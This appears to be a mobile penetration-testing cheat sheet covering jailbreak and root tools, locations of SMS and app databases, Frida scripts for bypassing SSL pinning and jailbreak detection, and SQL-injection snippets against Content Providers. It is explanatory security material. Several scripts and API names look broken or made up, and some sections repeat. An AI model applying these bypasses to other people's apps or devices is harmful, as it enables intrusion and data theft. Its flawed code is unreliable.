Table of contents
- IOS Jailbreak Methods
- Common iOS Jailbreaking Methods
- 1. Checkra1n
- 2. Unc0ver
- 3. Taurine
- 4. Electra
- 5. 3uTools
- 6. Dopamine
- Android Root Methods
- Common Android Rooting Methods
- 1. Magisk
- 2. SuperSU
- 3. KingoRoot
- 4. One Click Root
- 5. Odin (for Samsung Devices)
- Xposed Framework / EdXposed
- Installation and Usage
- Commands and Codes
- 7. DFT Pro
- Usage and Features
- Important Folders & Files
- Important Files and Folders in Android
- Application Data
- Shared Preferences
- SQLite Database
- SMS and MMS Data
- Attachments and Parts
- Samsung Messaging
- Important Files and Folders in iOS
- Application Data
- Example Detailed Paths and Files:
- Android
- iOS
- Example Database Tables and Their Significance:
- Android
- iOS
- Commands for SQLite Database Management:
- Android
- Example Database Tables and Their Significance:
- Android
- iOS
- Commands for SQLite Database Management:
- Android
- iOS
- Static Analytics
- iOS Static Analytics
- Method:
- Command and Codes (Using Hopper Disassembler):
- Android Static Analytics
- Method:
- Command and Codes (Using JADX):
- Important Global Offset Table Addresses
- Hooking
- iOS Dynamic Analytics
- Hooking Important Functions:
- Important Frida and Objection Scripts:
- Android Dynamic Analytics
- Hooking Important Functions:
- Important Frida and Objection Scripts:
- SSL Pin
- Top 10 Functions and Libraries for SSL Pinning Bypass
- Android:
- iOS:
- Root Detection
- Top 10 Libraries and Functions for Root Detection Bypass
- Android:
- iOS:
- Insecure Logging
- Android:
- iOS:
- Insecure Storage
- Android:
- iOS:
- Content Provider
- Android:
- iOS:
- Inadequate Supply Chain Security
- Android:
- iOS:
- Static Scanner
- Resources
Penetration testing applications for both iOS and Android platforms serve as invaluable tools for security professionals and ethical hackers to assess the security posture of mobile applications. These applications typically offer a range of features including dynamic analysis, static analysis, reverse engineering capabilities, network traffic interception, and vulnerability scanning. By simulating real-world attack scenarios, penetration testing applications help identify vulnerabilities such as insecure data storage, improper authentication mechanisms, insecure communication channels, and other security weaknesses that could be exploited by malicious actors. Additionally, they provide insights into potential risks and help organizations prioritize security measures to protect sensitive data and maintain the integrity of their mobile applications in an ever-evolving threat landscape.
IOS Jailbreak Methods
Jailbreaking an iOS device involves removing the software restrictions imposed by Apple, allowing users to gain root access to the iOS file system and manager. This process enables the installation of apps, themes, and tweaks that are not available through the official App Store. Below are some common jailbreaking methods, including commands and codes, along with their advantages and disadvantages.
ID | Jailbreak Tool | Method | Ease of Use |
1 | Checkra1n | - Download from official website |
- Use Terminal commands
- Follow on-screen DFU mode instructions | Medium |
| 2 | Unc0ver | - Download IPA file
- Install via AltStore
- Open app and tap "Jailbreak" | Easy |
| 3 | Taurine | - Download IPA file
- Install via AltStore
- Open app and tap "Jailbreak" | Easy |
| 4 | Electra | - Download IPA file
- Install via Cydia Impactor
- Open app and tap "Jailbreak" | Medium |
| 5 | 3uTools | - Download and install 3uTools on Windows
- Connect device and open 3uTools
- Navigate to "Flash & JB" tab and select "Jailbreak" | Very Easy |
| 6 | Dopamine | - Download IPA file
- Install via AltStore
- Open app and tap "Jailbreak" | Easy |
Common iOS Jailbreaking Methods
Checkra1n
Unc0ver
Taurine
Electra
3utools
Dopamine
1. Checkra1n
Overview: Checkra1n is based on the checkm8 bootrom exploit and supports iOS devices from iPhone 5s to iPhone X running iOS 12.0 to iOS 14.5.
Commands and Codes:
Download Checkra1n:
Download the latest version from the official website.
Transfer the file to your Mac or Linux computer.
Running Checkra1n on macOS:
# Open Terminal
cd /path/to/checkra1n
sudo ./checkra1n
- Running Checkra1n on Linux:
# Open Terminal
cd /path/to/checkra1n
sudo ./checkra1n
Follow On-Screen Instructions:
Connect your iOS device via USB.
Follow the instructions to put your device in DFU mode.
The jailbreaking process will begin.
2. Unc0ver
Overview: Unc0ver supports a wider range of iOS versions, from iOS 11.0 to iOS 14.3, and works on newer devices compared to Checkra1n.
Commands and Codes:
Download Unc0ver:
- Get the IPA file from the official website.
Install Unc0ver via AltStore:
Download and install AltStore on your computer.
Connect your device and install AltServer.
Use AltStore on your device to install the Unc0ver IPA.
Jailbreaking:
Open the Unc0ver app on your device.
Tap "Jailbreak" and wait for the process to complete.
3. Taurine
Overview: Taurine, developed by the Odyssey Team, supports iOS 14.0 to iOS 14.3 and is known for its speed and reliability.
Commands and Codes:
Download Taurine:
- Get the IPA file from the official website.
Install Taurine via AltStore:
- Follow the same steps as with Unc0ver to use AltStore for installation.
Jailbreaking:
Open the Taurine app on your device.
Tap "Jailbreak" and follow the on-screen instructions.
4. Electra
Overview: Electra is an older tool, suitable for jailbreaking iOS 11.0 to iOS 11.4.1.
Commands and Codes:
Download Electra:
- Obtain the IPA file from the official website.
Install Electra via Cydia Impactor:
Download Cydia Impactor and connect your device.
Drag the Electra IPA into Cydia Impactor and follow the installation steps.
Jailbreaking:
Open the Electra app on your device.
Tap "Jailbreak" and let the process complete.
5. 3uTools
Overview: 3uTools is a comprehensive tool for iOS devices, providing features for flashing firmware, managing files, and jailbreaking. It's a user-friendly tool that integrates several jailbreaking methods, making it easier for users to perform various tasks without needing multiple tools.
Method:
Download and Install 3uTools:
Download the latest version of 3uTools from the official website.
Install 3uTools on your Windows computer.
Launch 3uTools and Connect Your Device:
- Open 3uTools and connect your iOS device using a USB cable.
Jailbreaking with 3uTools:
Navigate to the "Flash & JB" tab.
Select "Jailbreak."
3uTools will automatically detect the iOS version and provide the appropriate jailbreak tool (e.g., Checkra1n, Unc0ver).
Follow On-Screen Instructions:
Follow the prompts to enter DFU mode (if required).
The jailbreaking process will begin and complete automatically.
Commands and Codes:
Entering DFU Mode:
- Follow the on-screen steps to put your device in DFU mode, which generally involves holding down the Power and Home/Volume buttons.
6. Dopamine
Overview: Dopamine is a modern jailbreak tool for iOS, primarily supporting newer iOS versions and devices. It's designed for ease of use and reliability.
Method:
Download Dopamine:
- Obtain the latest Dopamine IPA from the official website.
Install Dopamine via AltStore:
Download and install AltStore on your computer (available for both macOS and Windows).
Connect your iOS device and open AltServer.
Use AltStore on your device to install the Dopamine IPA.
Jailbreaking:
Open the Dopamine app on your device.
Tap "Jailbreak" and follow the on-screen instructions.
Commands and Codes:
Installing AltStore:
- macOS:
brew install --cask altserver
Open AltServer and follow the instructions to install AltStore on your device.
Windows:
- Download the AltServer installer from the official website and follow the installation steps.
Using AltStore:
Connect your device via USB.
Open AltStore on your device and select "Install AltStore."
Select the Dopamine IPA file and follow the prompts to install it.
Android Root Methods
ID | Root Tool | Method | Ease of Use |
1 | KingoRoot | - Download KingoRoot APK |
- Install and run the APK
- Tap "One Click Root" | Very Easy |
| 2 | One Click Root | - Download One Click Root software
- Install on PC
- Connect device via USB
- Follow on-screen instructions | Very Easy |
| 3 | Magisk | - Install Magisk Manager
- Flash Magisk zip via custom recovery (e.g., TWRP)
- Reboot and manage root with Magisk Manager | Easy |
| 4 | SuperSU | - Download SuperSU zip
- Flash SuperSU zip via custom recovery (e.g., TWRP)
- Reboot device | Easy |
| 5 | Odin (for Samsung) | - Download Odin and CF-Auto-Root
- Boot device into Download Mode
- Connect to PC
- Use Odin to flash CF-Auto-Root | Medium |
| 6 | Xposed or EdXposed | - Install Magisk
- Install Riru module
- Install EdXposed module
- Reboot device
- Manage modules with EdXposed Manager | Medium |
| 7 | DFT Pro | - Install DFT Pro on PC
- Connect device via USB
- Use DFT Pro software to root device | Medium |
| 8 | Chimera | - Install Chimera Tool
- Connect device to PC
- Use Chimera Tool to root device | Medium |
| 9 | Global Unlocker Pro | - Install Global Unlocker Pro
- Connect device to PC
- Use software to root device | Medium |
| 10 | Pandora Box | - Install Pandora Box
- Connect device to PC
- Use Pandora Box to root device | Medium |
| 11 | Infinity CM2 Dongle | - Install Infinity CM2 Dongle software
- Connect device to PC
- Use software to root device | Medium |
Rooting an Android device involves gaining administrative or superuser access to the operating system, allowing users to bypass manufacturer restrictions. This enables the installation of custom ROMs, advanced system tweaks, and specialized apps. Here are some common Android rooting methods, including commands and codes, along with their advantages and disadvantages.
Common Android Rooting Methods
Magisk
SuperSU
KingoRoot
One Click Root
Odin (for Samsung devices)
Xposed or EdXposed
DFT Pro
chimera
Global Unlocker Pro
Pandora Box
infinity-cm2-dongle
1. Magisk
Overview: Magisk is a popular tool that allows you to root your device systemlessly, meaning it doesn't modify the system partition. This makes it easier to hide the root status from apps that detect it, like banking apps.
Commands and Codes:
Download Magisk:
- Download the latest Magisk zip and Magisk Manager APK from the official website.
Install Magisk:
Boot your device into custom recovery (e.g., TWRP).
In TWRP, select "Install" and choose the Magisk zip file.
Swipe to confirm the flash.
Install Magisk Manager:
- After rebooting, install the Magisk Manager APK.
2. SuperSU
Overview: SuperSU was one of the first widespread rooting solutions, modifying the system partition to grant root access.
Commands and Codes:
Download SuperSU:
- Download the SuperSU zip file from the official website.
Install SuperSU:
Boot your device into custom recovery (e.g., TWRP).
In TWRP, select "Install" and choose the SuperSU zip file.
Swipe to confirm the flash.
3. KingoRoot
Overview: KingoRoot offers a one-click root solution, available for both PC and APK versions.
Commands and Codes:
Download KingoRoot:
Download KingoRoot APK from the official website.
Alternatively, download the KingoRoot PC application.
Root with KingoRoot APK:
Install the APK on your device.
Open KingoRoot and tap "One Click Root."
Root with KingoRoot PC:
Install KingoRoot on your PC.
Connect your device via USB and enable USB debugging.
Open KingoRoot and click "Root."
4. One Click Root
Overview: One Click Root is a commercial rooting service that provides easy rooting with guaranteed support.
Commands and Codes:
Download One Click Root:
- Download the One Click Root software from the official website.
Root with One Click Root:
Install the software on your PC.
Connect your device via USB and enable USB debugging.
Open One Click Root and follow the on-screen instructions.
5. Odin (for Samsung Devices)
Overview: Odin is a Samsung-specific tool used for flashing firmware, including rooting files like CF-Auto-Root.
Commands and Codes:
Download Odin and CF-Auto-Root:
- Download Odin and the CF-Auto-Root file for your device.
Prepare Your Device:
Enable USB debugging and OEM unlock in developer options.
Boot your device into Download Mode (Power + Volume Down + Home/Bixby).
Root with Odin:
Open Odin on your PC.
Connect your device via USB.
Load the CF-Auto-Root file into Odin.
Click "Start" to begin the flashing process.
Xposed Framework / EdXposed
Xposed Framework: The Xposed Framework is a versatile tool that allows users to modify the behavior of their Android device's OS and apps without changing the APKs or flashing custom ROMs. It operates by loading modules that can alter system and app functionalities at runtime.
EdXposed: EdXposed is an evolution of the Xposed Framework, designed to work with newer Android versions and to be compatible with the Magisk systemless root solution. It uses the Riru module to inject itself into the Android runtime environment.
Installation and Usage
Xposed Framework Installation:
Download Xposed Installer:
- Download the Xposed Installer APK from the official Xposed website or trusted sources.
Install Xposed Installer:
- Install the APK on your device.
Install Xposed Framework:
Open the Xposed Installer app and go to the "Framework" section.
Tap "Install/Update" to install the Xposed framework.
Reboot your device.
EdXposed Installation:
Install Magisk:
- Follow the Magisk installation steps to ensure your device is rooted systemlessly.
Install Riru:
- Open the Magisk Manager app, go to the "Downloads" section, and install the Riru module.
Install EdXposed:
From the Magisk Manager app, install the EdXposed module (either YAHFA or SandHook version).
Reboot your device.
Install EdXposed Manager:
- Download and install the EdXposed Manager APK to manage and configure EdXposed modules.
Commands and Codes
Checking Root Status:
su
Using Magisk for Installation:
# Install Riru via Magisk
magisk --install-module riru.zip
# Install EdXposed via Magisk
magisk --install-module edxposed-yahfa.zip
# or
magisk --install-module edxposed-sandhook.zip
7. DFT Pro
DFT Pro (Digital Forensics Tool Pro): DFT Pro is a powerful forensic tool used for extracting and analyzing data from mobile devices, primarily used in legal and investigative contexts. It supports a wide range of devices, including Android and iOS, and can retrieve deleted data, call logs, messages, app data, and more.
Usage and Features
Install DFT Pro:
Obtain the DFT Pro software from the official website or authorized distributors.
Install the software on your computer.
Connect Device:
Connect the target mobile device to the computer using a USB cable.
Ensure USB debugging is enabled on Android devices and necessary permissions are granted on iOS devices.
Data Extraction:
Launch DFT Pro and select the connected device.
Choose the type of data you want to extract (e.g., messages, call logs, app data).
Initiate the extraction process.
Data Analysis:
Use the built-in tools to analyze the extracted data.
Generate reports and export findings for further review.
Important Folders & Files
ID | Title | Path | Type of File |
1 | Application Databases | /data/data/app_name/databases/*.sqlite, .db | SQLite Database Files |
2 | Shared Preferences | /data/data/app_name/shared_prefs | XML Files |
3 | SMS and MMS Database | /data/com.android.providers.telephony |
/databases/mmssms.db | SQLite Database Files |
| 4 | MMS Attachments | /data/user_de/0/com.android.providers.
telephony/app_parts | Media Files |
| 5 | Samsung Messaging Database | /data/com.samsung.android.messaging
/databases/messages_content.db | SQLite Database Files |
| 6 | iOS Application Databases | /Applications/.../Library/Database | SQLite Database Files |
| 7 | iOS Application Preferences | /Applications/.../Library/Preferences | Property List (.plist) Files |
important files and folders in iOS and Android systems, focusing on common directories and databases that store critical application and system data. This includes paths, file types, and key tables within databases.
Important Files and Folders in Android
Application Data
Path:
/data/data/app_name/databases/*.sqlite
,.db
Description: Stores SQLite database files used by apps.
Example Files:
app_name.db
user_data.sqlite
Shared Preferences
Path:
/data/data/app_name/shared_prefs
Description: Stores XML files for app-specific shared preferences.
Example Files:
settings.xml
user_preferences.xml
SQLite Database
Command:
sqlite3
command-line tool for interacting with SQLite databases.Useful Commands:
.headers on
: Show column headers in query results..tables
: List all tables in the database.
SMS and MMS Data
Path:
/data/
com.android
.providers.telephony/databases/mmssms.db
Description: Database for SMS and MMS messages.
Tables of Interest:
addr
: Stores addresses related to messages.sms
: Contains SMS message data.mms
: Contains MMS message data.part
: Stores parts of MMS messages, like text and attachments.pdu
: Stores protocol data units of MMS messages.threads
: Contains threads of conversations.canonical_addresses
: Maps phone numbers to IDs.
Attachments and Parts
Path:
/data/user_de/0/
com.android
.providers.telephony/app_parts
- Description: Stores parts of MMS messages, such as images and other attachments.
Samsung Messaging
Path:
/data/
com.samsung.android
.messaging/databases/messages_content.db
Description: Database specific to Samsung's messaging app.
Tables of Interest: Similar to
mmssms.db
but specific to Samsung's implementation.
Important Files and Folders in iOS
Application Data
Path:
/Applications/.../Library/Database
Description: Stores SQLite databases for iOS applications.
Example Files:
app_data.sqlite
user_info.db
Example Detailed Paths and Files:
Android
App Data:
/data/data/com.example.myapp/databases/app_data.db
/data/data/com.example.myapp/shared_prefs/settings.xml
Telephony Data:
/data/
com.android
.providers.telephony/databases/mmssms.db
/data/user_de/0/
com.android
.providers.telephony/app_parts/attachment.jpg
Samsung Messaging:
/data/
com.samsung.android
.messaging/databases/messages_content.db
iOS
App Data:
/Applications/com.example.myapp/Library/Database/app_data.sqlite
/Applications/com.example.myapp/Library/Preferences/settings.plist
Example Database Tables and Their Significance:
Android
mmssms.db
:addr
: Stores message addresses.sms
: Stores text messages.mms
: Stores multimedia messages.part
: Stores individual parts of MMS messages.pdu
: Stores protocol data units for MMS.threads
: Manages conversation threads.canonical_addresses
: Maps contact numbers to internal IDs.
iOS
Example Database (
app_data.sqlite
):users
: Stores user information.messages
: Stores messages data.settings
: Stores application settings.
Commands for SQLite Database Management:
Android
Example Database Tables and Their Significance:
Android
mmssms.db
:addr
: Stores message addresses.sms
: Stores text messages.mms
: Stores multimedia messages.part
: Stores individual parts of MMS messages.pdu
: Stores protocol data units for MMS.threads
: Manages conversation threads.canonical_addresses
: Maps contact numbers to internal IDs.
iOS
Example Database (
app_data.sqlite
):users
: Stores user information.messages
: Stores messages data.settings
: Stores application settings.
Commands for SQLite Database Management:
Android
adb shell
sqlite3 /data/data/com.example.myapp/databases/app_data.db
Useful SQLite Commands:
.headers on
.tables
SELECT * FROM table_name;
iOS
Accessing SQLite Databases on a Jailbroken Device:
ssh root@<device-ip>
sqlite3 /Applications/com.example.myapp/Library/Database/app_data.sqlite
Static Analytics
Static analysis of iOS and Android applications involves examining the code and resources of an app without executing it. Important elements to analyze include the Global Offset Table (GOT), which holds addresses of functions and variables used in the application. Here's an overview of static analytics for both platforms, including methods and relevant commands:
iOS Static Analytics
Method:
Decompile the App:
- Use tools like Hopper, IDA Pro, or Ghidra to decompile the iOS application binary (Mach-O file).
Analyze the Global Offset Table (GOT):
Locate the GOT in the disassembled code.
Identify important addresses, such as function calls, library references, and variable access points.
Extract Strings and Resources:
Extract strings and resources from the binary for further analysis.
Look for sensitive information, API endpoints, and hardcoded values.
Command and Codes (Using Hopper Disassembler):
- Decompile Binary:
hopper disassemble -64 -o <output_directory> <app_binary_path>
Analyze GOT:
- Use Hopper's GUI to navigate to the Global Offset Table section and examine the addresses.
Extract Strings:
- Hopper provides a built-in feature to extract strings from the disassembled code.
Android Static Analytics
Method:
Decompile the APK:
- Use tools like JADX, apktool, or JADX-GUI to decompile the Android APK file.
Inspect Smali Code:
Explore the smali code to understand the application's structure and functionality.
Locate the Global Offset Table (GOT) equivalent in Android, which contains method and class references.
Extract Resources:
- Extract resources, such as XML files, layouts, and strings, for analysis.
Command and Codes (Using JADX):
- Decompile APK:
jadx -d <output_directory> <apk_file>
Inspect Smali Code:
Navigate to the
smali
directory in the output directory to explore the decompiled smali files.Search for relevant sections related to the GOT.
Extract Resources:
- Use JADX's built-in feature to extract XML files, layouts, and strings for further analysis.
Important Global Offset Table Addresses
iOS:
In iOS, the Global Offset Table (GOT) is part of the Mach-O binary format.
Addresses in the GOT typically point to external functions and variables.
Example:
0x10001000
- Address pointing to a function in a shared library.
Android:
In Android, the GOT equivalent is represented in the smali code.
Addresses point to method and class references used by the application.
Example:
Lcom/example/MainActivity;->onCreate(Landroid/os/Bundle;)V
- Reference to theonCreate
method of theMainActivity
class.
Hooking
Dynamic analysis of iOS and Android applications involves inspecting and manipulating the behavior of the app during runtime. Hooking important functions and using Frida and objection scripts are common techniques for dynamic analytics. Here's an overview, including methods, important scripts, and their applications:
iOS Dynamic Analytics
Hooking Important Functions:
Using Cydia Substrate or Substitute:
Hook into important functions using Substrate or Substitute, allowing you to intercept and modify behavior.
Common hooks include method swizzling, function interception, and dynamic class modification.
Frida Scripting:
- Use Frida to dynamically hook into iOS applications, enabling real-time function interception and manipulation.
Important Frida and Objection Scripts:
- Frida Script to Bypass Jailbreak Detection:
// JavaScript code to bypass jailbreak detection
Interceptor.attach(Module.findExportByName(null, "open"), {
onEnter: function(args) {
this.log("Bypassing jailbreak detection...");
args[0] = Memory.allocUtf8String("/private/var/lib/apt/");
}
});
Frida Script to Trace Objective-C Method Calls:
// JavaScript code to trace Objective-C method calls
function traceObjC(className) {
var hook = ObjC.classes[className];
for (var methodName in hook.$ownMethods) {
console.log("Tracing: " + className + "." + methodName);
try {
hook[methodName].implementation = ObjC.implement(hook[methodName], {
implementation: function() {
console.log(className + "." + methodName + " called with arguments: " + JSON.stringify(arguments));
return this[methodName].apply(this, arguments);
}
});
} catch (e) {
console.error("Error tracing " + className + "." + methodName + ": " + e);
}
}
}
Android Dynamic Analytics
Hooking Important Functions:
Using Xposed Framework:
Create Xposed modules to hook into Android applications and modify their behavior.
Hooks can intercept method calls, access private variables, and manipulate UI elements.
Frida Scripting:
- Utilize Frida to dynamically hook into Android applications, providing real-time function interception and manipulation.
Important Frida and Objection Scripts:
- Frida Script to Bypass SSL Pinning:
// JavaScript code to bypass SSL pinning
Java.perform(function() {
var CertificatePinner = Java.use("okhttp3.CertificatePinner");
CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function() {
console.log("[*] Bypassing SSL pinning");
};
});
Frida Script to Trace Java Method Calls:
// JavaScript code to trace Java method calls
Java.perform(function() {
var targetClass = Java.use("com.example.MainActivity");
targetClass.onCreate.implementation = function() {
console.log("onCreate() called");
this.onCreate();
};
});
SSL Pin
ID | Function/Library Name | Popularity |
1 | okhttp3.CertificatePinner.check (Android) | High |
2 | javax.net.ssl.X509TrustManager.checkServerTrusted (Android) | High |
3 | javax.net.ssl.SSLContext.init (Android) | High |
4 | android.webkit.WebViewClient.onReceivedSslError (Android) | High |
5 | javax.net.ssl.HttpsURLConnection.setSSLSocketFactory (Android) | High |
6 | NSURLSessionDelegate.URLSession:didReceive |
Challenge:completionHandler: (iOS) | High |
| 7 | NSURLConnectionDelegate.connection:didReceive
AuthenticationChallenge: (iOS) | High |
| 8 | CFReadStreamSetProperty (iOS) | High |
| 9 | NSURLRequest.allowsAnyHTTPSCertificateForHost (iOS) | High |
| 10 | SecTrustEvaluateWithError (iOS) | High |
| 11 | org.apache.http.impl.client.DefaultHttpClient (Android) | Medium |
| 12 | CFNetwork (iOS) | Medium |
| 13 | javax.net.ssl.HostnameVerifier.verify (Android) | Medium |
| 14 | okhttp3.OkHttpClient.Builder.sslSocketFactory (Android) | Medium |
| 15 | java.net.URL.openConnection (Android) | Medium |
| 16 | NSURLRequest.allowEgress (iOS) | Medium |
| 17 | SSLContext.getInstance (Android) | Medium |
| 18 | NSURLProtectionSpace.authenticationMethod (iOS) | Low |
| 19 | SSLContext.getInstance("TLS") (Android) | Low |
| 20 | NSURLSession:canAuthenticateAgainstProtectionSpace: (iOS) | Low |
commonly hooked functions and libraries used to bypass SSL pinning in both Android and iOS applications with Frida and objection:
Top 10 Functions and Libraries for SSL Pinning Bypass
Android:
OkHttp (Android):
Library:
okhttp3
Functions to Hook:
CertificatePinner.check
SSLContext.getInstance
TrustManager (Android):
Library:
javax.net
.ssl
Functions to Hook:
X509TrustManager.checkServerTrusted
HttpClient (Android):
Library:
org.apache.http.impl.client.DefaultHttpClient
Functions to Hook:
SSLContext.init
WebView (Android):
Library:
android.webkit
Functions to Hook:
WebViewClient.onReceivedSslError
HttpsURLConnection (Android):
Library:
javax.net
.ssl
Functions to Hook:
HttpsURLConnection.setSSLSocketFactory
iOS:
NSURLSession (iOS):
Library:
Foundation
Functions to Hook:
-[NSURLSessionDelegate URLSession:didReceiveChallenge:completionHandler:]
NSURLConnection (iOS):
Library:
Foundation
Functions to Hook:
-[NSURLConnectionDelegate connection:didReceiveAuthenticationChallenge:]
CFNetwork (iOS):
Library:
CFNetwork
Functions to Hook:
CFReadStreamSetProperty
NSURLRequest (iOS):
Library:
Foundation
Functions to Hook:
-[NSURLRequest allowsAnyHTTPSCertificateForHost:]
SecTrustEvaluate (iOS):
Library:
Security
Functions to Hook:
SecTrustEvaluateWithError
Frida and Objection scripts to hook the CertificatePinner.check
method in the OkHttp library, commonly used for SSL pinning in Android applications:
// Android SSL Pinning Bypass with Frida
// Define the target class and method to hook
var className = "okhttp3.CertificatePinner";
var methodName = "check";
// Hook into the CertificatePinner.check method
Interceptor.attach(Module.findExportByName(null, "Java_" + className.replace(/\./g, "_") + "_" + methodName), {
onEnter: function(args) {
console.log("[*] CertificatePinner.check() hooked!");
// Log the arguments passed to the method
console.log("[+] Hostname: " + args[1].readUtf8String());
console.log("[+] Certificate: " + args[2].readUtf8String());
// Modify the behavior if needed
// args[0] = Memory.allocUtf8String("modified_certificate");
// args[1] = Memory.allocUtf8String("example.com");
}
});
Sample Objection Command:
# Start the objection tool and spawn a Frida gadget script to bypass SSL pinning
objection --gadget "com.example.app" explore --script "path/to/frida_script.js"
Root Detection
ID | Function/Library Name | Popularity |
1 | java.lang.Runtime.exec (Android - Magisk Detection) | High |
2 | java.io.File.exists (Android - Superuser.apk Detection) | High |
3 | com.scottyab.rootbeer.RootBeer.isRooted (Android - RootBeer Library) | High |
4 | java.io.File.canExecute (Android - Su Binary Detection) | High |
5 | java.io.File.exists (Android - BusyBox Detection) | High |
6 | Foundation.fileExistsAtPath (iOS - Jailbreak Detection) | High |
7 | Foundation.fileExistsAtPath (iOS - Cydia Detection) | High |
8 | Foundation.fileExistsAtPath (iOS - SSH Daemon Detection) | High |
9 | Foundation.fileExistsAtPath (iOS - MobileSubstrate Detection) | High |
10 | Foundation.sandboxed (iOS - App Sandbox Integrity Check) | High |
11 | java.lang.System.getenv (Android - Environment Variable Detection) | Medium |
12 | android.os.Build.PRODUCT (Android - Build Properties Detection) | Medium |
13 | java.lang.Class.forName (Android - Class Loading Detection) | Medium |
14 | com.scottyab.rootbeer.RootBeer.checkForDangerousProps (Android - RootBeer Library) | Medium |
15 | android.os.Debug.isDebuggerConnected (Android - Debugger Detection) | Medium |
16 | java.io.File.listRoots (Android - Root Filesystem Detection) | Medium |
17 | Foundation.fileExistsAtPath (iOS - Symbolic Link Detection) | Medium |
18 | System.loadLibrary (Android - Native Library Loading Detection) | Medium |
19 | com.scottyab.rootbeer.RootBeer.checkForSuBinary (Android - RootBeer Library) | Low |
20 | com.scottyab.rootbeer.RootBeer.detectTestKeys (Android - RootBeer Library) | Low |
top 10 libraries and function names commonly hooked to bypass root detection using Frida and objection in both Android and iOS applications:
Top 10 Libraries and Functions for Root Detection Bypass
Android:
Magisk Detection (Android):
Library:
java.lang.Runtime
Function:
exec
Superuser.apk Detection (Android):
Library:
java.io
.File
Function:
exists
RootBeer Library (Android):
Library:
com.scottyab.rootbeer.RootBeer
Function:
isRooted
Su Binary Detection (Android):
Library:
java.io
.File
Function:
canExecute
BusyBox Detection (Android):
Library:
java.io
.File
Function:
exists
iOS:
Jailbreak Detection (iOS):
Library:
Foundation
Function:
fileExistsAtPath
Cydia Detection (iOS):
Library:
Foundation
Function:
fileExistsAtPath
SSH Daemon Detection (iOS):
Library:
Foundation
Function:
fileExistsAtPath
MobileSubstrate Detection (iOS):
Library:
Foundation
Function:
fileExistsAtPath
App Sandbox Integrity Check (iOS):
Library:
Foundation
Function:
sandboxed
Insecure Logging
insecure logging in Android and iOS applications, including both native and third-party logging frameworks:
Android:
Logcat (Native Android Logging):
- Command:
adb logcat
- Command:
Filtering by Priority Level:
Command: Filter logs by priority level (V, D, I, W, E, F, S).
Example: Show logs with priority level higher than or equal to
W
(Warning) and tagMyApp
adb logcat *:W MyApp:*
- Filtering by Keyword:
Command: Filter logs by a specific keyword in the message.
Example: Show logs containing the keyword
error
adb logcat | grep -i error
- Filtering by Application Name:
Command: Filter logs by the name of the application package.
Example: Show logs for the application with package name
com.example.app
adb logcat | grep com.example.app
- Continuous Logging:
Command: Continuously stream logs, updating in real-time.
Example: Continuously stream logs
adb logcat -v time
- Filtering by Process ID (PID):
Command: Filter logs by a specific process ID.
Example: Show logs for process ID
12345
adb logcat --pid=12345
iOS:
NSLog (Native iOS Logging):
- Command: Not applicable (logging output visible in Xcode Console or retrieved from the device)
NSLog (Native iOS Logging):
- Command: Not applicable (logging output visible in Xcode Console or retrieved from the device)
NSLog(@"Message: %@", variable);
- OSLog (Native iOS Logging):
- Command: Not applicable (logging output visible in Xcode Console or retrieved from the device)
os_log(OS_LOG_DEFAULT, "Message: %@", variable);
Insecure Storage
insecure storage in Android and iOS applications, including both native and common third-party libraries:
Android:
Insecure SharedPreferences (Native Android):
Command: Not applicable (accessed programmatically)
Code: Accessing SharedPreferences without encryption
SharedPreferences prefs = getSharedPreferences("my_prefs", Context.MODE_PRIVATE);
String secret = prefs.getString("secret_key", "");
- Insecure SQLite Database (Native Android):
Command: Not applicable (accessed programmatically)
Code: Creating an SQLite database without proper encryption
SQLiteDatabase db = dbHelper.getWritableDatabase();
- Insecure File Storage (Native Android):
Command: Not applicable (accessed programmatically)
Code: Writing sensitive data to external storage
File file = new File(Environment.getExternalStorageDirectory(), "data.txt");
FileOutputStream fos = new FileOutputStream(file);
iOS:
Insecure UserDefaults (Native iOS):
Command: Not applicable (accessed programmatically)
Code: Accessing UserDefaults without encryption
let defaults = UserDefaults.standard
let secret = defaults.string(forKey: "secret_key") ?? ""
- Insecure Keychain (Native iOS):
Command: Not applicable (accessed programmatically)
Code: Storing sensitive data in Keychain without proper protection:
let keychain = Keychain(service: "com.example.myapp")
try keychain.set("password", key: "user_password")
- Insecure File Storage (Native iOS):
Command: Not applicable (accessed programmatically)
Code: Writing sensitive data to local file system
let data = "sensitive_data".data(using: .utf8)!
try data.write(to: URL(fileURLWithPath: "/path/to/file.txt"))
Content Provider
Content Providers can lead to unauthorized access and data leakage in both Android and iOS applications. Here are the top 20 commands for potential attacks on Content Providers in Android and iOS:
Android:
SQL Injection Attack (Query Injection) (Native Android):
- Command: Inject malicious SQL code into a query.
String maliciousSelection = "1 OR 1=1";
Cursor cursor = getContentResolver().query(Uri, projection, maliciousSelection, selectionArgs, sortOrder);
Unauthorized Data Access (Native Android):
- Command: Access Content Provider without proper permissions.
Cursor cursor = getContentResolver().query(Uri, projection, selection, selectionArgs, sortOrder);
Excessive Data Leakage (Native Android):
- Command: Query all data without proper filtering.
Cursor cursor = getContentResolver().query(Uri, null, null, null, null);
Exported Content Provider (AndroidManifest.xml) (Native Android):
- Command: Check if Content Provider is exported.
<provider
android:name=".MyContentProvider"
android:authorities="com.example.provider"
android:exported="true"/>
SQL Injection Attack (Projection Injection) (Native Android):
- Command: Inject malicious projection into a query.
String[] maliciousProjection = {"column1", "column2", "1 OR 1=1"};
Cursor cursor = getContentResolver().query(Uri, maliciousProjection, selection, selectionArgs, sortOrder);
iOS:
Unauthorized Data Access (Native iOS):
- Command: Access CNContactStore without proper permissions.
let store = CNContactStore()
let keysToFetch = [CNContactGivenNameKey]
let predicate = CNContact.predicateForContacts(matchingName: "John")
do {
let contacts = try store.unifiedContacts(matching: predicate, keysToFetch: keysToFetch)
} catch {
print("Error accessing contacts: \(error)")
}
Excessive Data Leakage (Native iOS):
- Command: Query all contacts without proper filtering.
let store = CNContactStore()
let keysToFetch = [CNContactGivenNameKey]
let allContacts = CNContactFetchRequest(keysToFetch: keysToFetch)
do {
let contacts = try store.unifiedContacts(matching: allContacts)
} catch {
print("Error accessing contacts: \(error)")
}
Exported Content Provider (Info.plist) (Native iOS):
- Command: Check if CNContactStore usage description is provided
<key>NSContactsUsageDescription</key>
<string>We need access to contacts for better user experience</string>
Data Modification (Native iOS):
- Command: Modify contacts without proper permissions.
let store = CNContactStore()
let contact = CNMutableContact()
contact.givenName = "Jane"
let saveRequest = CNSaveRequest()
saveRequest.update(contact)
do {
try store.execute(saveRequest)
} catch {
print("Error updating contact: \(error)")
}
Inadequate Supply Chain Security
